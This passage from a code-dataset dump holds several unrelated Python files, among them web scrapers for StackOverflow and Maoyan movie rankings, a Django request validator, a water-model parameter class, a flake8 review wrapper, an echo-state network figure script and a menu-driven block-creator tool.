4)\", \n \"Imagery: Landsat, 2008-2018\",\n vmax=2,\n vmin=0,\n cmap_array='OrRd')","sub_path":"landsat_analysis.py","file_name":"landsat_analysis.py","file_ext":"py","file_size_in_byte":22443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"322552425","text":"import json\n\n\ndef write_order_to_json(item, quantity, price, buyer, date):\n add_data = {'item': item, 'quantity': quantity, 'price': price, 'buyer': buyer, 'date': date}\n try:\n with open('orders.json', 'r') as f:\n data = json.loads(f.read())\n data['data'].append(add_data)\n except FileNotFoundError:\n data = {'data': [add_data]}\n with open('orders.json', 'w') as f:\n f.write(json.dumps(data, indent=4))\n\n\nwrite_order_to_json('Toys', 11, 565, 'HNM', '11.01.18')\n","sub_path":"HW2/task2/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282627016","text":"from selenium import webdriver\n\nimport bs4 as bs\n\nquestion = input(\"question >>> \")\n\n_driver = None\n\ndef main () :\n\tSTART_PHANTOM()\n\n\twords = question.split(\" \")\n\tweb_question = \"\"\n\tfor word in words :\n\t\tweb_question += (word + \"+\")\n\tweb_question = web_question[:-1]\n\tprint (\"searching >>> \" + web_question)\n\n\t_driver.get(\"https://stackoverflow.com/search?q=\" + web_question)\n\t_driver.find_element_by_class_name(\"question-hyperlink\").click()\n\n\tsrc = _driver.page_source\n\n\tsoup = bs.BeautifulSoup(src,\"lxml\")\n\n\ta = soup.find('div', class_='answer accepted-answer')\n\tfinal = a.find('div', class_='post-text')\n\n\twith open(\"data.txt\",\"w\") as f :\n\t\tf.write(final.text)\n\t\tf.close()\n\n\tprint(\"### ANSWER ###\")\n\tprint(final.text)\n\n\t_driver.quit()\n\t\n\n\ndef START_CHROME () :\n\tglobal _driver\n\t\n\tfrom selenium.webdriver.chrome.options import Options\n\n\tchrome_options = Options() \n\tchrome_options.add_argument(\"--headless\")\n\tchrome_options.binary_location = '/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary'\n\t\n\t_driver = webdriver.Chrome(executable_path= \"/Users/machina/Desktop/WebScraping/StackOverflowBot/chrome_driver\" , chrome_options=chrome_options)\n\t\n\ndef START_PHANTOM () :\n\tglobal _driver\n\n\t_driver = webdriver.PhantomJS()\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"stackoverflowcli/stackoverflowcli.py","file_name":"stackoverflowcli.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270616161","text":"import urllib.request\nimport xml.etree.ElementTree as ET\n\nurl = input('Enter location: ')\n\ncount = 0\nsum = 0\nprint('Retrieving', url)\nuh = urllib.request.urlopen(url)\ndata = uh.read()\nprint('Retrieved', len(data), 'characters')\ntree = ET.fromstring(data)\n\nvalues = tree.findall('.//count')\n\nfor value in values:\n count = count + 1\n text = value.text\n sum = sum + int(text)\n\nprint('Count:', count)\nprint('Sum:', sum)\n\n","sub_path":"student/geoxml.py","file_name":"geoxml.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"364527262","text":"\"\"\"\r\n 猫眼TOP100榜单排名\r\n 2019-10-09\r\n 邱深知\r\n\"\"\"\r\n\r\nfrom requests.exceptions import RequestException\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n\r\ndef get_one_page(url):\r\n headers = {\r\n 
\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\"\r\n }\r\n try:\r\n response = requests.get(url,headers=headers)\r\n if response.status_code == 200:\r\n return response.content.decode()\r\n return None\r\n except RequestException:\r\n return None\r\n\r\ndef parse_one_page(html):\r\n soup = BeautifulSoup(html,'lxml')\r\n title = re.compile('title=\"(.*?)\"')\r\n imgst = re.compile('data-src=\"(.*?)\"')\r\n shangyin = re.compile('<p class=\"releasetime\">(.*?)</p>')\r\n zhuyans = re.compile('<p class=\"star\">\\S*\\s*(.*?)\\s*\\S*</p>')\r\n pingfen1 = re.compile('<p class=\"score\"><i class=\"integer\">(.*?)</i>')\r\n pingfen2 = re.compile('</i><i class=\"fraction\">(.*?)</i></p>')\r\n\r\n\r\n #标题\r\n page = soup.select('div > div > div.movie-item-info > p.name > a')\r\n ps = re.findall(title,str(page))\r\n # 图片\r\n imgs = soup.select('a > img.board-img')\r\n imgss = re.findall(imgst, str(imgs))\r\n #主演\r\n zhuyan = soup.select('div > div > div.movie-item-info > p.star')\r\n zhuyanss = re.findall(zhuyans,str(zhuyan))\r\n #上映时间\r\n shangying = soup.select('div > div > div.movie-item-info > p.releasetime')\r\n shanyings = re.findall(shangyin,str(shangying))\r\n #评分\r\n pingfens = soup.select('div > div > div.movie-item-number.score-num > p')\r\n pinfen1 = re.findall(pingfen1,str(pingfens))\r\n pinfen2 = re.findall(pingfen2,str(pingfens))\r\n\r\n\r\n for title,imgss,zhuya,shanyin,pinfen1,pinfen2 in zip(ps,imgss,zhuyanss,shanyings,pinfen1,pinfen2):\r\n # print(\"标题:\"+title)\r\n # print(\"图片:\"+imgss)\r\n # print(zhuya)\r\n # print(shanyin)\r\n # print(\"评分:\"+pinfen1+pinfen2)\r\n text = \"标题:\"+title+\"\\n\"+\"图片:\"+imgss+\"\\n\"+zhuya+\"\\n\"+shanyin+\"\\n\"+\"评分:\"+pinfen1+pinfen2+\"\\n\"\r\n with open('TOP100排名.txt', 'a', encoding='utf-8')as f:\r\n f.write(text)\r\n f.close()\r\n\r\n\r\ndef main():\r\n pages = 0\r\n # try:\r\n while True:\r\n if pages >=101 :\r\n print(\"已经爬取10页!\")\r\n break\r\n else:\r\n url = \"https://maoyan.com/board/4?offset={}\".format(pages)\r\n html = get_one_page(url)\r\n parse_one_page(html)\r\n pages += 10\r\n print(url)\r\n # except:\r\n # print(\"爬取%d\"%pages+\"成功!\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"278596886","text":"__author__ = 'kakshilshah'\nimport constants\nimport re\nfrom api.models import *\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\nfrom responseParser import ResponseParser\nclass Validator(object):\n \"\"\"A validator object validates parameters and stores appropriate response.\n Attributes:\n statusCode: A string representing the customer's name.\n parameters: A float tracking the current balance of the customer's account.\n message:\n \"\"\"\n def __init__(self,request,parametersList):\n self.request = request\n self.requestQueryDictionary = self.convertToDict(request.POST)\n self.parametersList = parametersList\n\n def applyConstraints(self,constraintsList):\n self.constraintsList = constraintsList\n\n def isValidated(self):\n\n if not len(self.parametersList) == len(self.constraintsList):\n return False\n\n for i in range(0,len(self.parametersList)):\n\n parameterName = self.parametersList[i]\n parameterConstraint = self.constraintsList[i]\n\n if parameterConstraint == constants.TYPE_NOTNULL:\n if not 
parameterName in self.requestQueryDictionary:\n                    return False\n\n            elif parameterConstraint == constants.TYPE_TEXT:\n                if parameterName not in self.requestQueryDictionary:\n                    return False\n                if len(self.requestQueryDictionary[parameterName]) == 0:\n                    return False\n\n            elif parameterConstraint == constants.TYPE_PHONE:\n                if parameterName not in self.requestQueryDictionary:\n                    return False\n                if not len(self.requestQueryDictionary[parameterName]) == 10:\n                    return False\n\n            elif parameterConstraint == constants.TYPE_DEVICE:\n                if parameterName not in self.requestQueryDictionary:\n                    return False\n                if self.requestQueryDictionary[parameterName] not in constants.DEVICE_TYPES:\n                    return False\n\n            elif parameterConstraint == constants.TYPE_EMAIL:\n                # Do not return the check result directly: an early True here\n                # would skip validation of the remaining parameters\n                if parameterName not in self.requestQueryDictionary:\n                    return False\n                if not self.validateEmail(self.requestQueryDictionary[parameterName]):\n                    return False\n\n            elif parameterConstraint == constants.TYPE_LATLONG:\n                if parameterName not in self.requestQueryDictionary:\n                    return False\n                if not self.validateLatLong(self.requestQueryDictionary[parameterName]):\n                    return False\n\n            elif parameterConstraint == constants.TYPE_USERID:\n                if parameterName not in self.requestQueryDictionary:\n                    return False\n                if not self.validateUserID(self.requestQueryDictionary[parameterName]):\n                    return False\n\n        return True\n\n    def getParametersDictionary(self):\n        return self.requestQueryDictionary\n\n    def getErrorBlock(self):\n        if not len(self.parametersList) == len(self.constraintsList):\n            return ResponseParser.getParsedErrorMessage(constants.ERROR_INTERNAL_PARAMETER)\n\n        for i in range(0,len(self.parametersList)):\n            parameterName = self.parametersList[i]\n            parameterConstraint = self.constraintsList[i]\n\n            if parameterConstraint == constants.TYPE_NOTNULL:\n                if parameterName not in self.requestQueryDictionary:\n                    # Report the missing parameter by name; indexing the query\n                    # dictionary for an absent key would raise a KeyError\n                    return ResponseParser.getParsedValidMessage(parameterName)\n\n            elif parameterConstraint == constants.TYPE_TEXT:\n                if parameterName not in self.requestQueryDictionary or len(self.requestQueryDictionary[parameterName]) == 0:\n                    return ResponseParser.getParsedValidMessage(parameterName)\n\n            elif parameterConstraint == constants.TYPE_PHONE:\n                if parameterName not in self.requestQueryDictionary or not len(self.requestQueryDictionary[parameterName]) == 10:\n                    return ResponseParser.getParsedValidMessage(parameterName)\n\n            elif parameterConstraint == constants.TYPE_DEVICE:\n                if parameterName not in self.requestQueryDictionary or self.requestQueryDictionary[parameterName] not in constants.DEVICE_TYPES:\n                    return ResponseParser.getParsedValidMessage(parameterName)\n\n            elif parameterConstraint == constants.TYPE_EMAIL:\n                if parameterName not in self.requestQueryDictionary:\n                    return ResponseParser.getParsedValidMessage(parameterName)\n                if not self.validateEmail(self.requestQueryDictionary[parameterName]):\n                    return ResponseParser.getParsedValidMessage(parameterName)\n\n            elif parameterConstraint == constants.TYPE_LATLONG:\n                if parameterName not in self.requestQueryDictionary:\n                    return ResponseParser.getParsedValidMessage(parameterName)\n                if not self.validateLatLong(self.requestQueryDictionary[parameterName]):\n                    return ResponseParser.getParsedValidMessage(parameterName)\n\n            elif parameterConstraint == constants.TYPE_USERID:\n                if parameterName not in self.requestQueryDictionary:\n                    return ResponseParser.getParsedValidMessage(parameterName)\n                if not self.validateUserID(self.requestQueryDictionary[parameterName]):\n                    return ResponseParser.getParsedValidMessage(parameterName)\n\n        return 
ResponseParser.gerGenericErrorMessage()\n\n\n def validateEmail( self,email ):\n from django.core.validators import validate_email\n from django.core.exceptions import ValidationError\n try:\n validate_email( email )\n return True\n except ValidationError:\n return False\n\n\n def validateLatLong(self,latLong):\n latLongRegex = re.compile(\"^(\\+)?(\\-)?([\\d]{1,3})(\\.)(\\d+)$\")\n if not latLongRegex.match(latLong):\n return False\n else:\n return True\n\n def convertToDict(self,queryDict):\n outputDict = {}\n for key in queryDict:\n value = queryDict[key]\n outputDict[key] = value\n return outputDict\n\n def validateUserID(self,userID):\n try:\n userObject = PapsterUser.objects.get(userID = userID)\n return True\n except ObjectDoesNotExist:\n return False\n except MultipleObjectsReturned:\n return False","sub_path":"api/core/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206376256","text":"from sierra.base_parameters import BaseParameter\n\nfrom sierra.utilities.converter import convert\n\n\nclass Upper_Collierville_Tunnel_1_Capacity(BaseParameter):\n\n def _value(self, timestep, scenario_index):\n capacity_cms = 800 / 35.31 # cfs to cms\n if self.model.mode == 'scheduling':\n if (6, 1) <= (timestep.month, timestep.day) <= (8, 1):\n capacity_cms = 100 / 35.31\n union_utica = self.model.nodes['Union-Utica Reservoir']\n # relief_reservoir = self.model.nodes['Relief Reservoir']\n if timestep.index == 0:\n prev_storage = union_utica.initial_volume\n else:\n prev_storage = union_utica.volume[scenario_index.global_id]\n prev_storage /= 1.2335\n\n if prev_storage <= 2:\n capacity_cms = 0\n elif prev_storage <= 3:\n capacity_cms = 150 / 35.31\n elif prev_storage <= 4:\n capacity_cms = 300 / 35.31\n\n else:\n capacity_cms *= self.days_in_month\n\n return capacity_cms\n\n def value(self, timestep, scenario_index):\n try:\n return convert(self._value(timestep, scenario_index), \"m^3 s^-1\", \"m^3 day^-1\", scale_in=1,\n scale_out=1000000.0)\n except Exception as err:\n print('\\nERROR for parameter {}'.format(self.name))\n print('File where error occurred: {}'.format(__file__))\n print(err)\n\n @classmethod\n def load(cls, model, data):\n return cls(model, **data)\n\n\nUpper_Collierville_Tunnel_1_Capacity.register()\n","sub_path":"sierra/models/stanislaus/_parameters/Upper_Collierville_Tunnel_1_Capacity.py","file_name":"Upper_Collierville_Tunnel_1_Capacity.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"559236707","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.11-x86_64/egg/reviewbot/tools/flake8.py\n# Compiled at: 2018-07-31 04:26:56\n\"\"\"Review Bot tool to run flake8.\"\"\"\nfrom __future__ import unicode_literals\nfrom reviewbot.tools import Tool\nfrom reviewbot.utils.process import execute, is_exe_in_path\n\nclass Flake8Tool(Tool):\n \"\"\"Review Bot tool to run flake8.\"\"\"\n name = b'flake8'\n version = b'1.0'\n description = b'Checks Python code for style and programming errors.'\n timeout = 30\n options = [\n {b'name': b'max_line_length', \n b'field_type': b'django.forms.IntegerField', \n b'default': 79, \n b'field_options': {b'label': b'Maximum Line Length', \n b'help_text': b'The maximum line length to 
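# [Illustrative sketch, not part of the original record] isValidated and
# getErrorBlock above walk the same constraint list twice with parallel branch
# logic. The checks can live in one table of predicates so both passes share a
# single loop. The constraint names and the lat/long regex are taken from the
# validator above; the rest is illustrative.
import re

_LATLONG = re.compile(r"^(\+)?(\-)?([\d]{1,3})(\.)(\d+)$")

CHECKS = {
    "TYPE_NOTNULL": lambda v: v is not None,
    "TYPE_TEXT": lambda v: isinstance(v, str) and len(v) > 0,
    "TYPE_PHONE": lambda v: isinstance(v, str) and len(v) == 10,
    "TYPE_LATLONG": lambda v: isinstance(v, str) and _LATLONG.match(v) is not None,
}

def validate(params, names, constraints):
    """Return (True, None) on success, else (False, first failing parameter name)."""
    for name, constraint in zip(names, constraints):
        if name not in params or not CHECKS[constraint](params[name]):
            return False, name
    return True, None

print(validate({"phone": "0123456789"}, ["phone"], ["TYPE_PHONE"]))  # (True, None)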
allow.', \n b'required': True}},\n {b'name': b'ignore', \n b'field_type': b'django.forms.CharField', \n b'default': b'', \n b'field_options': {b'label': b'Ignore', \n b'help_text': b'A comma-separated list of errors and warnings to ignore. This will be passed to the --ignore command line argument (e.g. E4,W).', \n b'required': False}}]\n\n def check_dependencies(self):\n \"\"\"Verify that the tool's dependencies are installed.\n\n Returns:\n bool:\n True if all dependencies for the tool are satisfied. If this\n returns False, the worker will not be listed for this Tool's queue,\n and a warning will be logged.\n \"\"\"\n return is_exe_in_path(b'flake8')\n\n def handle_file(self, f, settings):\n \"\"\"Perform a review of a single file.\n\n Args:\n f (reviewbot.processing.review.File):\n The file to process.\n\n settings (dict):\n Tool-specific settings.\n \"\"\"\n if not f.dest_file.lower().endswith(b'.py'):\n return\n path = f.get_patched_file_path()\n if not path:\n return\n output = execute([\n b'flake8',\n b'--exit-zero',\n b'--max-line-length=%s' % settings[b'max_line_length'],\n b'--ignore=%s' % settings[b'ignore'],\n path], split_lines=True)\n for line in output:\n try:\n line = line[len(path) + 1:]\n line_num, column, message = line.split(b':', 2)\n f.comment(message.strip(), int(line_num))\n except Exception:\n pass","sub_path":"pycfiles/reviewbot_worker-1.0.1.1-py2.7/flake8.py","file_name":"flake8.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"4776714","text":"# -----------------------------------------------------------------------------\n# Gated working memory with an echo state network\n# Copyright (c) 2018 Nicolas P. Rougier\n#\n# Distributed under the terms of the BSD License.\n# -----------------------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom data import generate_data, smoothen\nfrom model import generate_model, train_model, test_model\n\n\nif __name__ == '__main__':\n \n # Random generator initialization\n np.random.seed(123)\n \n # Testing data\n n_gate = 1\n n = 2500\n values = smoothen(np.random.uniform(-1, +1, n))\n ticks = np.random.uniform(0, 1, (n, n_gate)) < 0.01\n data = generate_data(values, ticks)\n\n y = data[\"input\"][0,0]\n output = []\n states = np.zeros((3,len(data)))\n a = 1000\n b = .001\n \n for i in range(len(data)):\n v,t = data[\"input\"][i]\n x0 = states[0,i] = b*v\n x1 = states[1,i] = b*v + a*t\n x2 = states[2,i] = a*t + b*y\n y = (np.tanh(x0) - np.tanh(x1) + np.tanh(x2))/b\n output.append(y)\n\n model = {\"output\" : np.array(output).reshape(len(output),1),\n \"state\" : np.array(states) }\n error = np.sqrt(np.mean((model[\"output\"] - data[\"output\"])**2))\n print(\"Error: {0}\".format(error))\n\n # Display\n fig = plt.figure(figsize=(14,6))\n fig.patch.set_alpha(0.0)\n n_subplots = 4\n\n ax1 = plt.subplot(n_subplots, 1, 1)\n ax1.tick_params(axis='both', which='major', labelsize=8)\n ax1.plot(data[\"input\"][:,0], color='0.75', lw=1.0)\n ax1.plot(data[\"output\"], color='0.75', lw=1.0)\n ax1.plot(model[\"output\"], color='0.00', lw=1.5)\n X, Y = np.arange(len(data)), np.ones(len(data))\n C = np.zeros((len(data),4))\n C[:,3] = data[\"input\"][:,1]\n ax1.scatter(X, -0.9*Y, s=1, facecolors=C, edgecolors=None)\n ax1.text(-25, -0.9, \"Ticks:\",\n fontsize=8, transform=ax1.transData,\n horizontalalignment=\"right\", verticalalignment=\"center\")\n ax1.set_ylim(-1.1,1.1)\n 
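# [Illustrative sketch, not part of the original record] handle_file in the flake8
# tool above strips the leading "path:" from each report line and splits the
# remainder on the first two colons. That parsing step in isolation, on a sample
# flake8 output line:
def parse_flake8_line(path, line):
    line = line[len(path) + 1:]               # drop the "path:" prefix
    line_num, column, message = line.split(":", 2)
    return int(line_num), int(column), message.strip()

sample = "foo.py:12:80: E501 line too long (88 > 79 characters)"
print(parse_flake8_line("foo.py", sample))    # (12, 80, 'E501 line too long ...')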
ax1.yaxis.tick_right()\n ax1.set_ylabel(\"Input & Output\")\n ax1.text(0.01, 0.9, \"A\",\n fontsize=16, fontweight=\"bold\", transform=ax1.transAxes,\n horizontalalignment=\"left\", verticalalignment=\"top\")\n\n\n for i in range(3):\n ax = plt.subplot(n_subplots, 1, 2+i, sharex=ax1)\n ax.tick_params(axis='both', which='major', labelsize=8)\n ax.set_ylim(-0.001, +0.001)\n ax.yaxis.tick_right()\n ax.text(0.01, 0.9, chr(ord(\"B\")+i),\n fontsize=16, fontweight=\"bold\", transform=ax.transAxes,\n horizontalalignment=\"left\", verticalalignment=\"top\")\n ax.plot(model[\"state\"][i,:], color='k', alpha=.5, lw=.5)\n ax.set_ylabel(\"Activity\")\n ax.set_yticks([-0.001,0.001])\n ax.set_yticklabels([\"$-10^{-3}$\",\"$+10^{-3}$\"])\n \n \n plt.tight_layout()\n plt.savefig(\"figure5.pdf\")\n plt.show()\n","sub_path":"figure5.py","file_name":"figure5.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69267981","text":"#from main_script import read_mhunter_csv, calculate_labelling, read_atomic_composition\nimport SauerFunction as sf\nfrom SauerClass import Record, Labelling\nimport argparse\n\n\n\n# Read all the relevant files\n#records = sf.read_mhunter_csv('sample_files/sample_input_data.csv')\n#atomic_composition, N_dict = sf.read_atomic_composition('sample_files/sample_input_formulae.csv')\n#fp = open('sample_files/out_temp.csv', 'w')\n\n\nparser = argparse.ArgumentParser(description='Do enrichment analysis.')\nparser.add_argument('-1','--input_data', help='Input data file name', required=True)\nparser.add_argument('-2','--input_formulae', help='Input formulae file name', required=True)\nparser.add_argument('-o','--output_filename', help='Name of output file', required=True)\nargs = vars(parser.parse_args())\n\nrecords = sf.read_mhunter_csv(args[\"input_data\"])\natomic_composition, N_dict = sf.read_atomic_composition(args[\"input_formulae\"])\nfp = open(args[\"output_filename\"], 'w')\n\n\nlabelling_list = []\nmax_results_length = 0\n\nfor record in records:\n results_dict = sf.calculate_labelling(record, N_dict, atomic_composition)\n for key, value in results_dict.items():\n if len(value) > max_results_length:\n max_results_length = len(value)\n labelling_list.append(Labelling(record.get_name(), results_dict))\n\nfp.write(\"Species, Labelling Source, Sample Name, Labelling %,\")\nfor i in range(max_results_length-1):\n fp.write(\"m\" + str(i) + \",\")\nfp.write(\"\\n\")\n\nfor label in labelling_list:\n species = label.get_species()\n label_dict = label.get_label_dict()\n names = label_dict.keys()\n names = sorted(names)\n i = 0\n for name in names:\n for key, value in label_dict.items():\n if name == key:\n fp.write(species + ',')\n if len(key.split(',')) == 2:\n fp.write(key.split(',')[1].strip('\"') + ',')\n fp.write(key.split(',')[0].strip('\"') + ',')\n else:\n fp.write(' ,')\n fp.write(key + ',')\n for val in value:\n fp.write(str(val) + ', ')\n fp.write('\\n')\nprint(\"Process complete; wrote out results.\")\n\n","sub_path":"proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375625735","text":"#!/usr/bin/env python3\n#-*-coding:utf-8-*-\nimport getpass\nimport json\nimport os\nimport socket\nimport subprocess\nimport sys\nimport threading\nimport time\n\nimport mysql\nimport mysql.connector\n\nfrom Library.DBook import Database\nfrom Library.TBook import 
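# [Illustrative sketch, not part of the original record] The three-unit update in
# figure5.py above is a gated working memory: with gate weight a = 1000 and input
# weight b = 0.001, the two tanh terms driven by the tick t saturate and cancel,
# so y copies the current value v when t = 1 and reproduces its own previous value
# when t = 0. Running just that recurrence on a toy sequence shows the gating:
import numpy as np

a, b = 1000, 0.001
y = 0.0
for v, t in [(0.3, 1), (0.8, 0), (-0.5, 0), (0.9, 1), (0.1, 0)]:
    y = (np.tanh(b * v) - np.tanh(b * v + a * t) + np.tanh(a * t + b * y)) / b
    print("v=%+.2f tick=%d -> y=%+.3f" % (v, t, y))
# y jumps to ~v on tick steps and holds its value between ticks.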
Tools\n\n\nclass Creator():\n    def __init__(self):\n        self.MagicWord = self.getModuleData(\"localDbPassword\",\"Tobias\")\n\n    def choiceList(self):\n        \"\"\"SETUP THE FIRST MENU\"\"\"\n\n        eachChoices = [\n            \"Créer un bloc\",\n            \"Créer une fonctionnalité\",\n            \"Lancer une fonctionnalité\",\n        ] #Choices the user can choose to move on\n\n        execute = {\n            \"1\" : \"self.createBloc()\",\n            \"2\" : \"self.createFeature()\",\n            \"3\" : \"self.feature()\"\n        } #Action launched when the user chooses a number\n\n        os.system(\"clear\")\n\n        for number, choice in enumerate(eachChoices, start=1): #Display the menu\n            print(f\"({number}) {choice} |\", end=\" \\n\")\n\n        answer = input(\"----> Votre choix : \")\n\n        # Ask again until the answer matches one of the menu keys, then run\n        # the matching action ('==' membership, not identity, decides a match)\n        while answer not in execute:\n            answer = input(\"----> Votre choix : \")\n        exec(execute[answer])\n\n    def createBloc(self):\n\n        os.system(\"clear\")\n\n        self.nom = input(\"Nom du bloc : \")\n        self.category = input(\"Catégorie du bloc [ Primaire | Secondaire | Script | multipleInput ]: \")\n        self.command = input(\"Commande à exécuter: \\n > \")\n\n        if self.category != \"Primaire\":\n            self.pattern = input(\"Emplacement dans le pattern: \\n > \")\n        else :\n            self.pattern = 0\n\n        Database(\"creator\",\"id\",\"name\",\"type\",\n        \"command\",\"category\",\"pattern\",\n        \"NULL\",f\"{self.nom}\",\"Bloc\",f\"{self.command}\",\n        f\"{self.category}\",f\"{self.pattern}\").insertInDatabase()\n\n        print(\"Bloc créé avec succès\")\n        time.sleep(1)\n        self.choiceList()\n        # Tools().Notification(\"Block Successfully Created\")\n\n    def fill(self):\n        self.MagicWord = self.getModuleData(\"localDbPassword\",\"Tobias\")\n\n        self.mydb = mysql.connector.connect(\n            host=\"localhost\",\n            user=\"root\",\n            passwd=self.MagicWord, port=\"8889\",\n        )\n\n        self.primaryContent = []\n        self.secondaryContent = []\n        self.featureContent = []\n        self.globalContent = []\n        self.globalPrimaryItems = []\n        self.Weird = []\n        self.scriptContent = []\n        self.multipleContent = []\n\n        Command = self.mydb.cursor()\n        Command.execute(\"USE tobiasdb\")\n        Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Primaire' AND type='Bloc'\")\n\n        for x in Command:\n            for lettre in x :\n                self.primaryContent.append(lettre)\n\n        Command.execute(\"USE tobiasdb\")\n        Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Secondaire' AND type='Bloc'\")\n\n        for x in Command:\n            for lettre in x :\n                self.secondaryContent.append(lettre)\n\n        Command.execute(\"USE tobiasdb\")\n        Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Script' AND type='Bloc'\")\n\n        for x in Command:\n            for lettre in x :\n                self.scriptContent.append(lettre)\n\n        Command.execute(\"USE tobiasdb\")\n        Command.execute(\"SELECT DISTINCT(name) FROM creator\")\n\n        for x in Command:\n            for lettre in x :\n                self.globalContent.append(lettre)\n\n        Command.execute(\"USE tobiasdb\")\n        Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE type='Feature'\")\n\n        for x in Command:\n            for lettre in x :\n                self.featureContent.append(lettre)\n\n        Command.execute(\"USE tobiasdb\")\n        Command.execute(\"SELECT DISTINCT(name) FROM creator 
WHERE category='multipleInputs'\")\n\n for x in Command:\n for lettre in x :\n self.multipleContent.append(lettre)\n\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Primaire'\")\n\n for x in Command:\n for lettre in x :\n self.globalPrimaryItems.append(lettre)\n\n os.system(\"clear\")\n blocDisplayed = []\n\n for i in range(0,len(self.multipleContent)):\n if len(self.multipleContent) == 0 :\n print(\"Aucun bloc prenant plusieur points d'entrées\")\n else :\n print(self.multipleContent[i]+\"\\n\")\n blocDisplayed.append(self.multipleContent[i])\n print(\" \"+\"_\"*len(self.multipleContent[i]))\n print(\"|\"+self.multipleContent[i]+\"|\"+f\" Bloc à MultiInput | Command : [{self.getCommand(self.multipleContent[i])}]\")\n print(\" \"+\"-\"*len(self.multipleContent[i]))\n\n for i in range(0,len(self.primaryContent)):\n if len(self.primaryContent) == 0 :\n print(\"Aucun blocs Primaires\")\n else :\n print(\" \"+\"_\"*len(self.primaryContent[i]))\n blocDisplayed.append(self.primaryContent[i])\n print(\"|\"+self.primaryContent[i]+\"|\"+f\" Bloc Primaire | Command : [{self.getCommand(self.primaryContent[i])}]\")\n print(\" \"+\"-\"*len(self.primaryContent[i]))\n\n for i in range(0,len(self.secondaryContent)):\n if len(self.secondaryContent) == 0 :\n print(\"Aucun blocs Secondaires\")\n else :\n print(\" \"+\"_\"*len(self.secondaryContent[i]))\n blocDisplayed.append(self.secondaryContent[i])\n print(\"|\"+self.secondaryContent[i]+\"|\"+f\" Bloc Secondaire | Command : [{self.getCommand(self.secondaryContent[i])}]\")\n print(\" \"+\"-\"*len(self.secondaryContent[i]))\n\n for i in range(0,len(self.scriptContent)):\n if len(self.scriptContent) == 0 :\n print(\"Aucun blocs Scripts\")\n else :\n print(\" \"+\"_\"*len(self.scriptContent[i]))\n blocDisplayed.append(self.scriptContent[i])\n print(\"|\"+self.scriptContent[i]+\"|\"+f\" Bloc Scripts | Command : [{self.getCommand(self.scriptContent[i])}]\")\n print(\" \"+\"-\"*len(self.scriptContent[i]))\n\n if len(self.blocList) != 0 :\n print(f\"Vos blocs sélectionnés : {self.blocList}\")\n print(\"_______________________________________________________________\")\n nextAction = input(\"\\n(1) Utiliser un bloc \\n(2) Chercher par lettres \\n(3) Créer une fonctionnalité avec les blocs actuelles \\n(4) Supprimer un bloc de la pioche \\n(5) Retour \\n----> Votre choix : \")\n \n self.goodWords = []\n good = 1\n\n choices = [\"1\",\"2\",\"3\",\"4\",\"5\"]\n for y in range(len(choices)):\n if choices[y] == nextAction :\n good = 0\n\n if good != 0 :\n for i in range(len(blocDisplayed)):\n if nextAction == blocDisplayed[i]:\n self.blocList.append(nextAction)\n self.fill()\n else :\n if blocDisplayed[i].count(nextAction) > 0:\n self.goodWords.append(blocDisplayed[i])\n\n if len(self.goodWords) == 0:\n print(\"Votre bloc n'existe pas\")\n time.sleep(0.5)\n self.fill()\n else: \n\n for i in range(len(self.goodWords)):\n print(f\"Bloc correspondant à la description {self.goodWords[i]}\\n ------\")\n \n answer = input(\"Lequel est ce ? [nom/aucun] \\n ----> Votre choix : \")\n if answer == \"aucun \":\n self.fill()\n else : \n self.blocList.append(answer)\n self.fill()\n\n\n if nextAction == \"1\" :\n\n blocToSelect = input(\"Quel est son nom ou numéro ? 
